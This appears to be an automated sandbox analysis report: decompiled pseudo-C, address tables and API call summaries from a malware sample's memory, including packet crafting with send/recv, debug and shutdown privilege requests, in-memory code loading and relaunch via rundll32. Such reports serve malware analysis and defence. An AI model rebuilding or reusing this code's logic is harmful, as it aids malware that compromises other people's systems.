                                                                                                          													 *((intOrPtr*)(_t249 + 0x18)) = 0x4c;
                                                                                                          													_t233 = _a8;
                                                                                                          													 *((short*)(_a8 + 3)) =  *_a16;
                                                                                                          													_t245 =  *(_t249 + 0x27) & 0x0000ffff;
                                                                                                          													_v24 = ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
                                                                                                          													_v8 = E04A432AF(_a4, _a12, ( *(_a12 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff, _t249, _a8,  *(_t249 + 0x27) & 0x0000ffff);
                                                                                                          													HeapFree(GetProcessHeap(), 8, _t249);
                                                                                                          													_v8 = 0xbadf00d;
                                                                                                          													if(_v8 == 0x10002) {
                                                                                                          														_t253 = _a16;
                                                                                                          														if(E04A43680(_t233, _a4, _a12, _v24,  *_a16 & 0x0000ffff, _v16,  &_v12) != 0 && E04A441E9(_t233, _t245, _a4,  &_a12,  *_t253 & 0x0000ffff,  &_v12) != 0) {
                                                                                                          															_v8 = _v8 & 0x00000000;
                                                                                                          														}
                                                                                                          														_t251 = _v12;
                                                                                                          													} else {
                                                                                                          														if(((0 | _v16 == 0x00000000) & (0 | 1 ==  *_t251) & (0 | _a20 == 0x00000005)) != 0) {
                                                                                                          															 *_t251 = 0;
                                                                                                          															goto L28;
                                                                                                          														}
                                                                                                          													}
                                                                                                          												}
                                                                                                          											}
                                                                                                          											goto L38;
                                                                                                          										}
                                                                                                          									}
                                                                                                          									L41:
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					L13:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _t251);
                                                                                                          				}
                                                                                                          				return _v8;
                                                                                                          				goto L41;
                                                                                                          			}
























                                                                                                          0x04a446c7
                                                                                                          0x04a446dd
                                                                                                          0x04a446ed
                                                                                                          0x04a446ef
                                                                                                          0x04a446f4
                                                                                                          0x04a44aa4
                                                                                                          0x04a446fa
                                                                                                          0x04a446fa
                                                                                                          0x04a44702
                                                                                                          0x04a44717
                                                                                                          0x04a4471e
                                                                                                          0x04a44731
                                                                                                          0x04a44734
                                                                                                          0x04a44739
                                                                                                          0x04a4473f
                                                                                                          0x04a44743
                                                                                                          0x04a4475a
                                                                                                          0x04a44761
                                                                                                          0x04a44788
                                                                                                          0x04a447ae
                                                                                                          0x04a447ae
                                                                                                          0x04a4478a
                                                                                                          0x04a4478f
                                                                                                          0x04a447a6
                                                                                                          0x04a447c2
                                                                                                          0x00000000
                                                                                                          0x04a447a8
                                                                                                          0x04a447a8
                                                                                                          0x04a447ac
                                                                                                          0x04a4475e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a447ac
                                                                                                          0x04a447a6
                                                                                                          0x00000000
                                                                                                          0x04a44788
                                                                                                          0x04a447cb
                                                                                                          0x00000000
                                                                                                          0x04a44745
                                                                                                          0x04a44756
                                                                                                          0x04a447ce
                                                                                                          0x04a447d9
                                                                                                          0x04a447e7
                                                                                                          0x00000000
                                                                                                          0x04a447e9
                                                                                                          0x04a447f9
                                                                                                          0x04a447fb
                                                                                                          0x04a44800
                                                                                                          0x00000000
                                                                                                          0x04a44802
                                                                                                          0x04a44806
                                                                                                          0x04a44959
                                                                                                          0x04a4495d
                                                                                                          0x04a44966
                                                                                                          0x04a4496c
                                                                                                          0x04a44970
                                                                                                          0x04a44976
                                                                                                          0x04a4497c
                                                                                                          0x04a44982
                                                                                                          0x04a44988
                                                                                                          0x04a4498c
                                                                                                          0x04a44992
                                                                                                          0x04a44998
                                                                                                          0x04a4499e
                                                                                                          0x04a449a2
                                                                                                          0x04a449a2
                                                                                                          0x04a449a6
                                                                                                          0x04a449b2
                                                                                                          0x04a449bb
                                                                                                          0x04a449bc
                                                                                                          0x04a449be
                                                                                                          0x04a449cb
                                                                                                          0x04a449db
                                                                                                          0x04a449df
                                                                                                          0x00000000
                                                                                                          0x04a449e5
                                                                                                          0x04a449e7
                                                                                                          0x04a449ec
                                                                                                          0x04a449f2
                                                                                                          0x04a449f6
                                                                                                          0x04a449fa
                                                                                                          0x04a44a01
                                                                                                          0x04a44a05
                                                                                                          0x04a44a06
                                                                                                          0x04a44a0a
                                                                                                          0x04a44a1a
                                                                                                          0x04a44a1e
                                                                                                          0x04a44a23
                                                                                                          0x04a44a3c
                                                                                                          0x00000000
                                                                                                          0x04a44a42
                                                                                                          0x04a44a49
                                                                                                          0x00000000
                                                                                                          0x04a44a49
                                                                                                          0x04a44a91
                                                                                                          0x04a44a99
                                                                                                          0x00000000
                                                                                                          0x04a44a99
                                                                                                          0x00000000
                                                                                                          0x04a4480c
                                                                                                          0x04a44815
                                                                                                          0x04a4481b
                                                                                                          0x04a44820
                                                                                                          0x04a44823
                                                                                                          0x04a44826
                                                                                                          0x04a44829
                                                                                                          0x04a4482c
                                                                                                          0x04a4482f
                                                                                                          0x04a44832
                                                                                                          0x04a44835
                                                                                                          0x04a4484b
                                                                                                          0x04a4484e
                                                                                                          0x04a44853
                                                                                                          0x04a4486c
                                                                                                          0x04a4486e
                                                                                                          0x04a4486e
                                                                                                          0x04a4486e
                                                                                                          0x04a44872
                                                                                                          0x04a44878
                                                                                                          0x04a44878
                                                                                                          0x04a4481b
                                                                                                          0x04a4487e
                                                                                                          0x04a44882
                                                                                                          0x04a4488d
                                                                                                          0x04a448a0
                                                                                                          0x04a448a4
                                                                                                          0x04a448ac
                                                                                                          0x04a448af
                                                                                                          0x04a448b2
                                                                                                          0x04a448b5
                                                                                                          0x04a448b8
                                                                                                          0x04a448bb
                                                                                                          0x04a448bf
                                                                                                          0x04a448c0
                                                                                                          0x04a448c7
                                                                                                          0x04a448ca
                                                                                                          0x04a448eb
                                                                                                          0x04a448ee
                                                                                                          0x04a448f2
                                                                                                          0x04a44900
                                                                                                          0x04a4490e
                                                                                                          0x04a44914
                                                                                                          0x04a44921
                                                                                                          0x04a44928
                                                                                                          0x04a44a52
                                                                                                          0x04a44a70
                                                                                                          0x04a44a8a
                                                                                                          0x04a44a8a
                                                                                                          0x04a44a8e
                                                                                                          0x04a4492e
                                                                                                          0x04a4494e
                                                                                                          0x04a44956
                                                                                                          0x00000000
                                                                                                          0x04a44956
                                                                                                          0x04a4494e
                                                                                                          0x04a44928
                                                                                                          0x04a448a4
                                                                                                          0x00000000
                                                                                                          0x04a44882
                                                                                                          0x04a44800
                                                                                                          0x00000000
                                                                                                          0x04a447e7
                                                                                                          0x04a44756
                                                                                                          0x04a44743
                                                                                                          0x04a4473f
                                                                                                          0x04a447b1
                                                                                                          0x04a447b7
                                                                                                          0x04a447b7
                                                                                                          0x04a44ab2
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000090,?,?,00000000,00000000,?,00000000,00000000,?), ref: 04A446E4
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A446E7
                                                                                                            • Part of subcall function 04A42497: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424AF
                                                                                                            • Part of subcall function 04A42497: HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424B8
                                                                                                            • Part of subcall function 04A42497: GetProcessHeap.KERNEL32(00000008,00001124,74714F20,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424CD
                                                                                                            • Part of subcall function 04A42497: HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A424D0
                                                                                                            • Part of subcall function 04A42497: rand.MSVCRT ref: 04A424E1
                                                                                                            • Part of subcall function 04A42497: htons.WS2_32(00001120), ref: 04A424FF
                                                                                                            • Part of subcall function 04A42497: rand.MSVCRT ref: 04A4255F
                                                                                                            • Part of subcall function 04A42497: GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04A4471C,?,?,?,?,?), ref: 04A42576
                                                                                                            • Part of subcall function 04A42497: HeapAlloc.KERNEL32(00000000,?,?,?,04A4471C,?,?,?,?,?), ref: 04A4257D
                                                                                                            • Part of subcall function 04A42497: htons.WS2_32(0000015C), ref: 04A4259F
                                                                                                            • Part of subcall function 04A42497: rand.MSVCRT ref: 04A425CD
                                                                                                          • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A4478F
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?), ref: 04A447B4
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A447B7
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000100,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 04A447F0
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A447F9
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000027), ref: 04A44810
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A44813
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000002), ref: 04A44875
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44878
                                                                                                          • Sleep.KERNEL32(000007D0), ref: 04A4488D
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000029), ref: 04A44897
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A4489A
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,?), ref: 04A44911
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44914
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000013), ref: 04A449D2
                                                                                                            • Part of subcall function 04A42E12: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04A42E32
                                                                                                            • Part of subcall function 04A42E12: HeapAlloc.KERNEL32(00000000), ref: 04A42E3B
                                                                                                            • Part of subcall function 04A42E12: GetProcessHeap.KERNEL32(00000008,00000048,74714F20), ref: 04A42E4D
                                                                                                            • Part of subcall function 04A42E12: HeapAlloc.KERNEL32(00000000), ref: 04A42E50
                                                                                                            • Part of subcall function 04A42E12: htons.WS2_32(00000044), ref: 04A42E68
                                                                                                            • Part of subcall function 04A42E12: send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04A42EF3
                                                                                                            • Part of subcall function 04A42E12: recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04A42F0B
                                                                                                            • Part of subcall function 04A42E12: GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A42F31
                                                                                                            • Part of subcall function 04A42E12: HeapFree.KERNEL32(00000000), ref: 04A42F38
                                                                                                            • Part of subcall function 04A42E12: GetProcessHeap.KERNEL32(00000008,?), ref: 04A42F43
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A449D5
                                                                                                            • Part of subcall function 04A43680: GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74714F20,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A43698
                                                                                                            • Part of subcall function 04A43680: HeapAlloc.KERNEL32(00000000,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A436A1
                                                                                                            • Part of subcall function 04A43680: GetProcessHeap.KERNEL32(00000008,00000027,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A436B1
                                                                                                            • Part of subcall function 04A43680: HeapAlloc.KERNEL32(00000000,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A436B4
                                                                                                            • Part of subcall function 04A43680: GetProcessHeap.KERNEL32(00000008,00000013,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A436C7
                                                                                                            • Part of subcall function 04A43680: HeapAlloc.KERNEL32(00000000,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A436CA
                                                                                                            • Part of subcall function 04A43680: Sleep.KERNEL32(000007D0,?,?,?,00000000,00000000,?,?,?,04A44A6E,?,?,?,?,00000000,?), ref: 04A437A2
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04A44A96
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A44A99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Free$Sleephtonsrand$recvsend
                                                                                                          • String ID: Uqt0Xqt
                                                                                                          • API String ID: 3041643382-3529349503
                                                                                                          • Opcode ID: 549728e7934ba08be751c94b573bb5d6c6c519e93c83aedb8a859d9de7361c91
                                                                                                          • Instruction ID: c3a3f5be5e7cbcfcf9c4eade03f91cb7aea2d6c3438826bba99d4a6aad40e353
                                                                                                          • Opcode Fuzzy Hash: 549728e7934ba08be751c94b573bb5d6c6c519e93c83aedb8a859d9de7361c91
                                                                                                          • Instruction Fuzzy Hash: 0BC1BDB5500346EAEB10DFA4C804BAEBBB5FFC9344F008419F885DB690E775E951DB64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 302 4a479d7-4a479ec call 4a47897 305 4a479fc-4a47a03 call 4a47f04 302->305 306 4a479ee-4a479f7 call 4a4923f 302->306 310 4a47a05-4a47a07 ExitProcess 305->310 311 4a47a0d-4a47a14 305->311 306->305 312 4a47a16 call 4a47e8e 311->312 313 4a47a1b-4a47acf call 4a484ee call 4a410a7 WSAStartup call 4a46c5f * 2 InitializeCriticalSection call 4a4652f call 4a47dd0 call 4a48192 CreateEventW CreateThread 311->313 312->313 329 4a47ad5-4a47ae8 CreateThread 313->329 330 4a47b99-4a47ba0 313->330 333 4a47af8-4a47b0a call 4a46cc8 329->333 334 4a47aea-4a47af1 329->334 331 4a47ba2-4a47baf call 4a4554a 330->331 332 4a47bde-4a47bf1 Sleep call 4a48a23 330->332 331->332 343 4a47bb1 331->343 341 4a47bf6-4a47c16 GetSystemDirectoryW 332->341 345 4a47b63-4a47b93 call 4a46cc8 CreateThread call 4a4a420 Sleep 333->345 346 4a47b0c-4a47b31 call 4a46c5f call 4a485fb 333->346 334->333 336 4a47af3 call 4a47146 334->336 336->333 349 4a47cc0-4a47cc2 341->349 350 4a47c1c-4a47c30 lstrcatW 341->350 347 4a47bb3-4a47bcd 343->347 345->330 346->345 364 4a47b33-4a47b39 346->364 347->347 352 4a47bcf-4a47bd9 call 4a4636b 347->352 350->349 354 4a47c36-4a47c4b GetModuleFileNameW 350->354 352->332 354->349 358 4a47c4d-4a47c7a PathFindFileNameW wsprintfW 354->358 360 4a47c7c-4a47c80 358->360 360->360 363 4a47c82-4a47c87 360->363 365 4a47c8a-4a47c8e 363->365 366 4a47b3c-4a47b4c call 4a4a3b1 call 4a4796e 364->366 365->365 367 4a47c90-4a47cba CreateProcessW ExitProcess 365->367 372 4a47b4e-4a47b56 call 4a46e66 366->372 373 4a47b5b-4a47b61 366->373 372->373 373->345 373->366
                                                                                                          C-Code - Quality: 75%
                                                                                                          			E04A479D7(void* __ebx, void* __ecx, void* __edi, char _a4, signed int _a8, char _a12, int _a16) {
                                                                                                          				char _v8;
                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                          				struct _STARTUPINFOW _v92;
                                                                                                          				char _v304;
                                                                                                          				short _v1652;
                                                                                                          				short _v1976;
                                                                                                          				short _v3212;
                                                                                                          				void* __esi;
                                                                                                          				void* _t60;
                                                                                                          				intOrPtr _t63;
                                                                                                          				void* _t72;
                                                                                                          				int _t78;
                                                                                                          				char* _t84;
                                                                                                          				char* _t85;
                                                                                                          				void* _t91;
                                                                                                          				char _t108;
                                                                                                          				void* _t119;
                                                                                                          				long _t120;
                                                                                                          				signed char* _t121;
                                                                                                          				long _t122;
                                                                                                          				signed int _t124;
                                                                                                          				signed int _t127;
                                                                                                          				intOrPtr _t128;
                                                                                                          				void* _t132;
                                                                                                          				intOrPtr* _t134;
                                                                                                          				void* _t135;
                                                                                                          
                                                                                                          				_t118 = __ecx;
                                                                                                          				_push(_t128);
                                                                                                          				E04A47897(__ecx, _t128);
                                                                                                          				if(_a16 != 0xffffffff) {
                                                                                                          					E04A4923F(__ecx, _a4, _a8, _a12); // executed
                                                                                                          				}
                                                                                                          				_t60 = E04A47F04(); // executed
                                                                                                          				if(_t60 != 0) {
                                                                                                          					ExitProcess(0);
                                                                                                          				}
                                                                                                          				_t142 =  *0x4a57bc0 & 0x00000002;
                                                                                                          				if(( *0x4a57bc0 & 0x00000002) != 0) {
                                                                                                          					E04A47E8E(_t118, _t142); // executed
                                                                                                          				}
                                                                                                          				E04A484EE(); // executed
                                                                                                          				E04A410A7(); // executed
                                                                                                          				_a8 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				_a16 = 0;
                                                                                                          				_a4 = 0;
                                                                                                          				__imp__#115(0x202, 0x4a581e0); // executed
                                                                                                          				_t63 = E04A46C5F(0x24, E04A46AA8, 0, 0xffff); // executed
                                                                                                          				 *0x4a57bb8 = _t63;
                                                                                                          				 *0x4a57b80 = E04A46C5F(8, E04A467F9, E04A4682F, 0xff);
                                                                                                          				 *0x4a57b88 = 0;
                                                                                                          				InitializeCriticalSection(0x4a57b9c);
                                                                                                          				E04A4652F(_t118, _a12); // executed
                                                                                                          				E04A47DD0(_t118,  &_a8,  &_v8,  &_a16,  &_a4); // executed
                                                                                                          				E04A48192(); // executed
                                                                                                          				_t72 = CreateEventW(0, 1, 0, 0);
                                                                                                          				_v24.dwThreadId = _t72;
                                                                                                          				CreateThread(0, 0, E04A48A6F, _t72, 0, 0); // executed
                                                                                                          				if(( *0x4a57b7c & 0x00000002) != 0) {
                                                                                                          					CreateThread(0, 0, E04A477D1, 0, 0, 0); // executed
                                                                                                          					if(( *0x4a57bc0 & 0x00000002) != 0 && ( *0x4a57b7c & 0x00000001) != 0) {
                                                                                                          						E04A47146(_t118, _t128); // executed
                                                                                                          					}
                                                                                                          					E04A46CC8( *0x4a57b80);
                                                                                                          					_t146 =  *0x4a57bc0 & 0x00000004;
                                                                                                          					if(( *0x4a57bc0 & 0x00000004) != 0) {
                                                                                                          						 *0x4a57b88 = E04A46C5F(4, E04A4787C, 0, 0xff);
                                                                                                          						_push( &_v304);
                                                                                                          						_t108 = E04A485FB(_t146);
                                                                                                          						if(_t108 != 0) {
                                                                                                          							_t134 =  &_v304;
                                                                                                          							_a12 = _t108;
                                                                                                          							do {
                                                                                                          								E04A4A3B1(_t118,  *_t134);
                                                                                                          								if(E04A4796E(_t118,  *_t134) != 0) {
                                                                                                          									E04A46E66(_t118,  *0x4a57b88, _t134, 0);
                                                                                                          								}
                                                                                                          								_t134 = _t134 + 4;
                                                                                                          								_t28 =  &_a12;
                                                                                                          								 *_t28 = _a12 - 1;
                                                                                                          							} while ( *_t28 != 0);
                                                                                                          						}
                                                                                                          					}
                                                                                                          					_t128 =  *0x4a57b88;
                                                                                                          					E04A46CC8(_t128);
                                                                                                          					CreateThread(0, 0, E04A4A1A9, 0, 0, 0); // executed
                                                                                                          					E04A4A420(_t118, _a16 * 0xea60); // executed
                                                                                                          					Sleep(_a8 * 0xea60); // executed
                                                                                                          				}
                                                                                                          				if(( *0x4a57b7c & 0x00000010) != 0) {
                                                                                                          					_t91 = E04A4554A(_t118,  &(_v92.dwFlags), 0x21); // executed
                                                                                                          					if(_t91 != 0) {
                                                                                                          						_t132 = 0;
                                                                                                          						do {
                                                                                                          							_t121 = _t135 + _t132 - 0x2c;
                                                                                                          							_t127 = 0x3e;
                                                                                                          							_t124 = ( *_t121 & 0x000000ff) % _t127;
                                                                                                          							_t132 = _t132 + 1;
                                                                                                          							_t41 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + _t124; // 0x33323130
                                                                                                          							 *_t121 =  *_t41;
                                                                                                          						} while (_t132 < 0x20);
                                                                                                          						_v24.dwProcessId = 0;
                                                                                                          						E04A4636B( &(_v92.dwFlags), _v24.dwThreadId); // executed
                                                                                                          					}
                                                                                                          				}
                                                                                                          				Sleep((_a4 + _v8) * 0xea60); // executed
                                                                                                          				E04A48A23();
                                                                                                          				asm("int3");
                                                                                                          				_push(_t135);
                                                                                                          				_push(_t128);
                                                                                                          				_t78 = GetSystemDirectoryW( &_v1976, 0x30c);
                                                                                                          				if(_t78 != 0) {
                                                                                                          					_t78 = lstrcatW( &_v1652, L"\\rundll32.exe");
                                                                                                          					if(_t78 != 0) {
                                                                                                          						_t78 = GetModuleFileNameW( *0x4a57b98, 0x4a57bc8, 0x30c);
                                                                                                          						if(_t78 != 0) {
                                                                                                          							wsprintfW( &_v3212, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1652, PathFindFileNameW(0x4a57bc8), _a8);
                                                                                                          							_t119 = 0x10;
                                                                                                          							_t84 =  &_v24;
                                                                                                          							do {
                                                                                                          								 *_t84 = 0;
                                                                                                          								_t84 = _t84 + 1;
                                                                                                          								_t119 = _t119 - 1;
                                                                                                          							} while (_t119 != 0);
                                                                                                          							_t122 = 0x44;
                                                                                                          							_t120 = _t122;
                                                                                                          							_t85 =  &_v92;
                                                                                                          							do {
                                                                                                          								 *_t85 = 0;
                                                                                                          								_t85 = _t85 + 1;
                                                                                                          								_t120 = _t120 - 1;
                                                                                                          							} while (_t120 != 0);
                                                                                                          							_v92.cb = _t122;
                                                                                                          							_t78 = CreateProcessW( &_v1652,  &_v3212, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                          							ExitProcess(0);
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t78;
                                                                                                          			}





























                                                                                                          0x04a479d7
                                                                                                          0x04a479e1
                                                                                                          0x04a479e3
                                                                                                          0x04a479ec
                                                                                                          0x04a479f7
                                                                                                          0x04a479f7
                                                                                                          0x04a479fc
                                                                                                          0x04a47a03
                                                                                                          0x04a47a07
                                                                                                          0x04a47a07
                                                                                                          0x04a47a0d
                                                                                                          0x04a47a14
                                                                                                          0x04a47a16
                                                                                                          0x04a47a16
                                                                                                          0x04a47a1b
                                                                                                          0x04a47a20
                                                                                                          0x04a47a31
                                                                                                          0x04a47a34
                                                                                                          0x04a47a37
                                                                                                          0x04a47a3a
                                                                                                          0x04a47a3d
                                                                                                          0x04a47a50
                                                                                                          0x04a47a66
                                                                                                          0x04a47a75
                                                                                                          0x04a47a7a
                                                                                                          0x04a47a80
                                                                                                          0x04a47a89
                                                                                                          0x04a47a9e
                                                                                                          0x04a47aa3
                                                                                                          0x04a47aad
                                                                                                          0x04a47ac3
                                                                                                          0x04a47ac6
                                                                                                          0x04a47acf
                                                                                                          0x04a47adf
                                                                                                          0x04a47ae8
                                                                                                          0x04a47af3
                                                                                                          0x04a47af3
                                                                                                          0x04a47afe
                                                                                                          0x04a47b03
                                                                                                          0x04a47b0a
                                                                                                          0x04a47b1e
                                                                                                          0x04a47b29
                                                                                                          0x04a47b2a
                                                                                                          0x04a47b31
                                                                                                          0x04a47b33
                                                                                                          0x04a47b39
                                                                                                          0x04a47b3c
                                                                                                          0x04a47b3e
                                                                                                          0x04a47b4c
                                                                                                          0x04a47b56
                                                                                                          0x04a47b56
                                                                                                          0x04a47b5b
                                                                                                          0x04a47b5e
                                                                                                          0x04a47b5e
                                                                                                          0x04a47b5e
                                                                                                          0x04a47b3c
                                                                                                          0x04a47b31
                                                                                                          0x04a47b63
                                                                                                          0x04a47b69
                                                                                                          0x04a47b78
                                                                                                          0x04a47b84
                                                                                                          0x04a47b93
                                                                                                          0x04a47b93
                                                                                                          0x04a47ba0
                                                                                                          0x04a47ba8
                                                                                                          0x04a47baf
                                                                                                          0x04a47bb1
                                                                                                          0x04a47bb3
                                                                                                          0x04a47bb3
                                                                                                          0x04a47bbe
                                                                                                          0x04a47bbf
                                                                                                          0x04a47bc1
                                                                                                          0x04a47bc2
                                                                                                          0x04a47bc8
                                                                                                          0x04a47bca
                                                                                                          0x04a47bd6
                                                                                                          0x04a47bd9
                                                                                                          0x04a47bd9
                                                                                                          0x04a47baf
                                                                                                          0x04a47beb
                                                                                                          0x04a47bf1
                                                                                                          0x04a47bf6
                                                                                                          0x04a47bf7
                                                                                                          0x04a47c00
                                                                                                          0x04a47c0e
                                                                                                          0x04a47c16
                                                                                                          0x04a47c28
                                                                                                          0x04a47c30
                                                                                                          0x04a47c43
                                                                                                          0x04a47c4b
                                                                                                          0x04a47c6b
                                                                                                          0x04a47c76
                                                                                                          0x04a47c77
                                                                                                          0x04a47c7c
                                                                                                          0x04a47c7c
                                                                                                          0x04a47c7e
                                                                                                          0x04a47c7f
                                                                                                          0x04a47c7f
                                                                                                          0x04a47c84
                                                                                                          0x04a47c85
                                                                                                          0x04a47c87
                                                                                                          0x04a47c8a
                                                                                                          0x04a47c8a
                                                                                                          0x04a47c8c
                                                                                                          0x04a47c8d
                                                                                                          0x04a47c8d
                                                                                                          0x04a47cb0
                                                                                                          0x04a47cb3
                                                                                                          0x04a47cba
                                                                                                          0x04a47cba
                                                                                                          0x04a47c4b
                                                                                                          0x04a47c30
                                                                                                          0x04a47cc2

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A47897: GetTickCount.KERNEL32 ref: 04A478AF
                                                                                                            • Part of subcall function 04A47897: srand.MSVCRT ref: 04A478B2
                                                                                                            • Part of subcall function 04A47897: GetTickCount.KERNEL32 ref: 04A478B9
                                                                                                            • Part of subcall function 04A47897: GetModuleFileNameW.KERNEL32(04A57BC8,0000030C,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A47926
                                                                                                          • ExitProcess.KERNEL32 ref: 04A47A07
                                                                                                            • Part of subcall function 04A4923F: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,04A479FC,?,?,?), ref: 04A4927B
                                                                                                            • Part of subcall function 04A4923F: memcpy.MSVCRT ref: 04A49294
                                                                                                            • Part of subcall function 04A4923F: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04A49303
                                                                                                            • Part of subcall function 04A4923F: VirtualFree.KERNEL32(00000000,?,00004000), ref: 04A49323
                                                                                                          • WSAStartup.WS2_32(00000202,04A581E0), ref: 04A47A3D
                                                                                                          • InitializeCriticalSection.KERNEL32(04A57B9C,00000008,04A467F9,04A4682F,000000FF,00000024,04A46AA8,00000000,0000FFFF), ref: 04A47A80
                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,000000FF,?,?), ref: 04A47AAD
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04A48A6F,00000000,00000000,00000000), ref: 04A47AC6
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04A477D1,00000000,00000000,00000000), ref: 04A47ADF
                                                                                                            • Part of subcall function 04A47E8E: PathFileExistsW.KERNELBASE(?,?), ref: 04A47EB1
                                                                                                            • Part of subcall function 04A47E8E: GetCurrentProcess.KERNEL32(?,?), ref: 04A47EC3
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,04A4A1A9,00000000,00000000,00000000), ref: 04A47B78
                                                                                                            • Part of subcall function 04A4A420: GetProcessHeap.KERNEL32(00000008,00000004,747143E0,?,00000000,?,?,04A47B89,000000FF), ref: 04A4A436
                                                                                                            • Part of subcall function 04A4A420: HeapAlloc.KERNEL32(00000000,?,?,04A47B89,000000FF), ref: 04A4A439
                                                                                                            • Part of subcall function 04A4A420: CreateThread.KERNELBASE ref: 04A4A454
                                                                                                            • Part of subcall function 04A4A420: GetProcessHeap.KERNEL32(00000000,00000000,?,?,04A47B89,000000FF), ref: 04A4A463
                                                                                                            • Part of subcall function 04A4A420: HeapFree.KERNEL32(00000000,?,?,04A47B89,000000FF), ref: 04A4A466
                                                                                                          • Sleep.KERNELBASE(?,000000FF), ref: 04A47B93
                                                                                                          • Sleep.KERNELBASE(?), ref: 04A47BEB
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04A47C0E
                                                                                                          • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04A47C28
                                                                                                          • GetModuleFileNameW.KERNEL32(04A57BC8,0000030C), ref: 04A47C43
                                                                                                          • PathFindFileNameW.SHLWAPI(04A57BC8,?), ref: 04A47C51
                                                                                                          • wsprintfW.USER32 ref: 04A47C6B
                                                                                                          • CreateProcessW.KERNEL32 ref: 04A47CB3
                                                                                                          • ExitProcess.KERNEL32 ref: 04A47CBA
                                                                                                            • Part of subcall function 04A4554A: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04A45561
                                                                                                            • Part of subcall function 04A4554A: GetLastError.KERNEL32(?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A4556B
                                                                                                            • Part of subcall function 04A4554A: CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04A4790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04A479E8), ref: 04A45581
